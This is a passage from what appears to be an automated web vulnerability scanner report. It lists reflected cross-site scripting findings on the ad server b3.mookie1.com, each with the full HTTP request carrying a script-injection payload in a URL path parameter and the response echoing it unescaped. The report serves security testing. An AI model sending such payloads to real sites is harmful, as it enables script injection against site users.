Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; dlx_20100929=set; other_20110126=set; session=1297259893|1297259895

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 328
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DMbdbd9"><script>alert(1)</script>5626391a536/DLX/1218755221/x71/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SR
...[SNIP]...

1.68. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d169"><script>alert(1)</script>8aae4752285 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX3d169"><script>alert(1)</script>8aae4752285/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/1937870846@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; dlx_20100929=set; other_20110126=set; session=1297259893|1297259895

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 328
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX3d169"><script>alert(1)</script>8aae4752285/1456575303/x71/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SR
...[SNIP]...

1.69. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59104"><script>alert(1)</script>0d7baf3eaeb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1@x7159104"><script>alert(1)</script>0d7baf3eaeb HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/1937870846@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; dlx_20100929=set; other_20110126=set; session=1297259893|1297259895

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 320
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/1635821032/x7159104"><script>alert(1)</script>0d7baf3eaeb/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SR
...[SNIP]...

1.70. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec060"><script>alert(1)</script>17affe4c170 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3ec060"><script>alert(1)</script>17affe4c170/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre2599322834474&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; ATTWL=CollectiveB3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3ec060"><script>alert(1)</script>17affe4c170/FarmersBranding/2011Q1/BTRT1/728/413346606/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.71. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49a73"><script>alert(1)</script>613ad088b59 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding49a73"><script>alert(1)</script>613ad088b59/2011Q1/BTRT1/728/11297259897490@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre2599322834474&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; ATTWL=CollectiveB3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding49a73"><script>alert(1)</script>613ad088b59/2011Q1/BTRT1/728/1759311885/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.72. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8482"><script>alert(1)</script>bb2b30cb153 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1e8482"><script>alert(1)</script>bb2b30cb153/BTRT1/728/11297259897490@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre2599322834474&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; ATTWL=CollectiveB3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1e8482"><script>alert(1)</script>bb2b30cb153/BTRT1/728/2062777249/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.73. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 266d4"><script>alert(1)</script>03f7cc0c04f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1266d4"><script>alert(1)</script>03f7cc0c04f/728/11297259897490@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre2599322834474&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; ATTWL=CollectiveB3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1266d4"><script>alert(1)</script>03f7cc0c04f/728/496007092/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.74. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c950c"><script>alert(1)</script>3ee1ce96ffb was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728c950c"><script>alert(1)</script>3ee1ce96ffb/11297259897490@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre2599322834474&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; ATTWL=CollectiveB3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728c950c"><script>alert(1)</script>3ee1ce96ffb/1687534056/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.75. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45e55"><script>alert(1)</script>e0df0920427 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x9045e55"><script>alert(1)</script>e0df0920427 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre2599322834474&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; ATTWL=CollectiveB3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/1988655677/x9045e55"><script>alert(1)</script>e0df0920427/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.76. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2866"><script>alert(1)</script>35771b99b3b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3b2866"><script>alert(1)</script>35771b99b3b/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre259932283447419cb2'%3E%3Cscript%3Ealert(1)%3C/script%3E9b01dc2c9cc&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; ATTWL=CollectiveB3; FarmersBranding=RocketFuelB3; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; session=1297259893|1297260360

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:30:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 363
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3b2866"><script>alert(1)</script>35771b99b3b/FarmersBranding/2011Q1/BTRT1/728/77016977/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.77. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fbe2"><script>alert(1)</script>3f1bfa77c87 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding9fbe2"><script>alert(1)</script>3f1bfa77c87/2011Q1/BTRT1/728/11297259930614@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre259932283447419cb2'%3E%3Cscript%3Ealert(1)%3C/script%3E9b01dc2c9cc&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; ATTWL=CollectiveB3; FarmersBranding=RocketFuelB3; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; session=1297259893|1297260360

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:30:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding9fbe2"><script>alert(1)</script>3f1bfa77c87/2011Q1/BTRT1/728/1096239429/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.78. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 732ad"><script>alert(1)</script>dbf52c5f68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1732ad"><script>alert(1)</script>dbf52c5f68/BTRT1/728/11297259930614@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
